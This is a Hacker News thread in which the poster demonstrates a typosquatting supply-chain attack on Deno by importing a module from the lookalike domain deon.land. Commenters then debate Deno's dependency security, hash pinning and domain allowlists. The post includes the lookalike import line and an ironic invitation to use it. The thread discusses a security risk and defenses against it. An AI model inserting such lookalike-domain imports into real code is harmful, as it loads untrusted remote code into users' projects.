Hacker News new | past | comments | ask | show | jobs | submit login
[flagged] Show HN: Deon.land – Deno.land?
32 points by hobofan on Feb 25, 2023 | hide | past | favorite | 24 comments
After yesterday's release of Deno with package.json support[0] some discussions about how Deno handles dependencies have been coming up again.

Since Deno's inception, I've mostly been watching it from the sidelines, dabbling a bit with it, and mostly been considering it a fad that will die out sooner or later.

Ultimately, with the new package.json support nothing really changed regarding the dependency management story of Deno. It's still as awful as ever.

Prompted by some discussions, I decided I would try to test how easy it would be to mount a typo-domain supply chain attack. And as expected, it's about as easy as buying a domain and setting up a Cloudflare Worker (which isn't any harder than setting up Deno Deploy).

And voila, for importing your favorite dependency, just copy-past the following snippet into your code (which after all is how you include dependencies in Deno):

```

import * as flat from "https://deon.land/x/flat@0.0.15/mod.ts";

```

Which is virtually indistinguishable from what you'll find here[1]:

```

import * as flat from "https://deno.land/x/flat@0.0.15/mod.ts";

```

(I swear, nothing bad will happen!)

-------

Typo supply-chain attack aren't anything new. They are probably the most popular attack type on package managers (and their registries) in the past few years. This one is just slightly different because it is even worse, because unlike a moderated[2] registry like npmjs.com, this can't be easily taken down to reduce the exposure of developers to it.

While this is just a fun little gag, the Deno teams stance on security is not so funny.

While Deno has a few minimal security options nowadays, such as subresource integrity for a deno.json, you have to actively seek them out, and most project's don't even use a deno.json.

Deno is creating a ecosystem with bad security defaults (with a community rejecting efforts towards them), to have a "simpler" system. They prioritize onboarding new developers over the security needs of the users of the services that those developers will build. I don't think that's okay.

So, go ahead and have fun: Replace deno.land with deon.land in every import you want. Deno won't stop you! :)

[0]: https://deno.com/blog/v1.31

[1]: https://deno.land/x/flat@0.0.15/mod.ts

[2]: https://docs.npmjs.com/reporting-malware-in-an-npm-package




What do you expect deno to do? Should it have a "repository" of whitelisted domains? Should it do typo checking for you? What is considered "good security defaults" here?

Deno doesn't intentionally control where and how you import dependencies as long as the code in the dependency is valid and I think that's better than gatekeeping domains. Deno has permissions built-in just for this - i.e., if a dependency goes rogue, there's some level of control.

Consider node/bun on the other hand. If a dependency goes rogue, there's virtually nothing stopping it except system permissions. That's a lot worse than deno.

I think Deno tries to solve the core issue with running untrusted code (like a browser does to some extent). Dependency control can only go so far. So no complaints here.

This also gives Deno flexibility to support package.json with the same exact security guarantees. Isn't that better?


> Should it have a "repository" of whitelisted domains?

Yes, actually.

Deno's security model allows you to whitelist file paths and network domains with --allow-read, --allow-write, and --allow-net. But this doesn't apply to static imports. I don't see why it needs to be this way.

There should at least be a flag or deno.json config option that would require you to explicitly approve every new import domain, which would prevent typo attacks and make long chains of transitive imports obvious. deno.land could be allowed by default.


One option would be to include some hash value in the URL to pin the code file, e.g

import ... from 'https://...##<...sha...>';

Then a typo would just result in a resolution error.


This could be implemented as an import assertion[1]:

import foo from 'http://example.com/foo' assert { sha256sum: '...' }

This feature would even be useful in the web platform in general. Would also be nice to see an assertion for importing plain text files (not just JSON files) and assertions for per-module Deno permissions.

[1]: https://github.com/tc39/proposal-import-assertions


I think for the web platform, there is already Subresource Integrity [1] which follows the same idea. Unfortunately, it works at the level of script tags, so can't be used inside a script. But maybe this could be a starting ground for making a proposal.

[1] https://en.m.wikipedia.org/wiki/Subresource_Integrity


Wanted to shime in on this since we are big supporters/users of deno and building an OSS enterprise-grade platform for a self-hosted lambda that runs deno scripts among others [1].

I think this is unfair because npm has its own set of issues, most notably, if anyone were to sneak up a non obvious trojan horse into the dependency chain, it would take a few weeks to be detected and millions of servers would already be compromised. You can do this with deno too but the norm is to use pinned version and a deps.ts, it takes a bit more than just an innocent npm install to break things.

The real security for scripts is in the sandboxing, permissioning model and providing self-contained scripts that you can read and analyze in one go. So far, node doesn't offer that experience yet. Deno is the leader of innovation in that specific area. It was a bold move and that it is moving back to node compatibility has a lot more to do with network effect and first mover advantage than an inherently bad design.

Bun is likely to have made the correct move by focusing on performance and node compatibility from a business/adoption standpoints (and we will add bun to our supported env as a consequence), but from a security perspective, deno is still the cutting-edge.

[1]: https://github.com/windmill-labs/windmill


It is also the norm to strictly pin dependency versions in the npm-ecosystem, at the project-level, via lockfiles. So simply doing an `npm install` in an existing project won't install the new trojan.

Yes, versions aren't usually pinned at the package-level, so if you install a new dependency that introduces the trojan to the project, then yeah your are compromised. Not sure if that happens to "millions of servers" in a few weeks tho, it'd have to be a pretty popular package at least and remain undetected when these millions of developers presumably test the new code that their new dependencies introduce.

Having versions tightly pinned in the package-level isn't a free gift. It'll lead in lots of duplicated versions of a practically same package being installed and ran when two higher level dependencies have a transitive dependency to sligthly different (but in practice compatible) versions of the same package.

Edit: I agree with the points about sandboxing and permission configuration, etc, though. That's hopefully also coming to Node at some point.


It seems to me that the norm in the node world is to use ^ specifier to say anything that is non-breaking, and that `npm install` will not respect the package-lock.json, only `npm ci` does.


> and that `npm install` will not respect the package-lock.json

I'm not sure where you get that from. Maybe this was the case for the first NPM version with package-lock.json, but at least for the current and previous LTS version, it is definitely being respected.


This is correct up to a point (which is why npm ci exist at all), I agree that in general since you would have to mutate the package.json for that to happen, my point is moot (https://stackoverflow.com/questions/45022048/why-does-npm-in...) but npm install will overwrite the package-lock.json if they do not match.


> if anyone were to sneak up a non obvious trojan horse into the dependency chain, it would take a few weeks to be detected and millions of servers would already be compromised. You can do this with deno too but the norm is to use pinned version and a deps.ts.

Only for consumers that blindly auto-update dependencies. The norm in the NPM world has also finally arrived at having a lockfile, so your are using pinned versions as well. The lockfile also has the additional benefit of reducing the impact of updating an individual dependency, as the resolution mechanism doesn't have to start from scratch and only a small part of the dependency tree will be updated.

With Deno's exact version pinning one is on the other hand significantly more exposed to CVEs in transitive dependencies, as one would have to rely on all dependencies to update their dependencies and coordinate the fixes throughout the ecosystem. In a system that is based around SemVer ranges and automated dependency resolution, one "only" has to bump the version to that transitive dependency. This could be remedied a bit in Deno by allowing URLs to be globally rewired (or mirroring/forking the whole dependency chain), but as far as I can tell this mechanism/tooling doesn't exist in Deno (yet).

> I think this is unfair

> sandboxing, permissioning model

> Deno is the leader of innovation in that specific area.

I think the only point that is unfair was the "the Deno teams stance on security is not so funny" (and I would strike it now if HN would still let me edit the post). You are right that their efforts on the sandboxing front is very commendable. However, the overall package (including their dependency management), doesn't feel thought through security-wise, and their URL-focused dependency story opens a lot of additional security holes.


Stop shirking responsibility for security off to centralized third parties. If you decide to type out a URL rather than copy it, and you mess up the URL, that's your fault and no one else's.

Hilarious, how we demonize NPM and now we're wondering why Deno doesn't handle dependencies like Node. Sometimes I hate the shit out of this field.


Wait until you learn what a webpage can link to and trick people into clicking!


They chose for a decentralised package management system whereas Node has a centralised one. A tradeoff as you mentioned is that you can't just take down malicious packages. I'm personally not too concerned with this because of the following:

1. The default permissions while running a script are stricter than Node's, you get told when your code tries to access your file system or network

2. Code I write for Deno typically uses fewer dependencies than the equivalent code for Node, simply because of how Deno has a good standard library with many web APIs

> the Deno teams stance on security is not so funny

Can you give examples of this?


Node is working to add module based permissions: https://nodejs.org/api/permissions.html

This might help against the supply chain attacks which node is also prone to after adding support for url imports (Yes, you can import directly from url in node too).


What would you propose changing for this specific issue? Would you still consider it broken if deno supports, e.g. `import * as flat from "https://mycustom.com/x/flat@0.0.15/mod.ts";`?


I never typed in the full http link of a dependency by hand. Does anyone do that?


Accidental typos aren't the only way this could be used. You could open a PR that contributes a new feature - all the code looks good, and the feature works as expected, but included in the PR is a new malicious dependency that uses deon.land instead of deno.land. That's an easy thing to miss when reviewing a large PR.


NPM can specify GitHub URLs as dependencies, so I don't see how this is a problem exclusive to Deno and not Node.

Also, this problem can be mitigated by static analysis. No reason why a pre-push hook can't look at all the import identifiers and restrict them to a whitelist of domains.

But having mentioned this before in another recent thread about Deno, some people are under the impression that statically analyzing imports is really hard, despite how even a junior engineer could figure it out with an AST parser in a day.


First time I saw fontawesome being imported in a PR I had to double check to make sure fortawesome wasn't a typo.

npm install @fortawesome/fontawesome-svg-core


Typo attacks aren't just about typing the error by hand. They are often more about fooling human visual perception.

E.g. for a more large-scale attack, you could replicate the whole deno.land/x/ website, which is where people often copy-paste the import snippet from. And as the sibling comment points out, typo-ed dependencies can also be introduced into existing codebases via a PR.


Nobpdy did. But where did you got that link from?

With nginx and LE it quite trivial to have soemsite.tld to serve a valid content for somesite.tld, except the payload.


We are moving to a regime where every app you run must be sandboxed and containerized (à la Flatpak). But that won't be enough. The next step is sandboxing and containerizing every library you depend on.


It would have been better if "The next step is sandboxing and containerizing every library you depend on." was the first step instead of the second.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: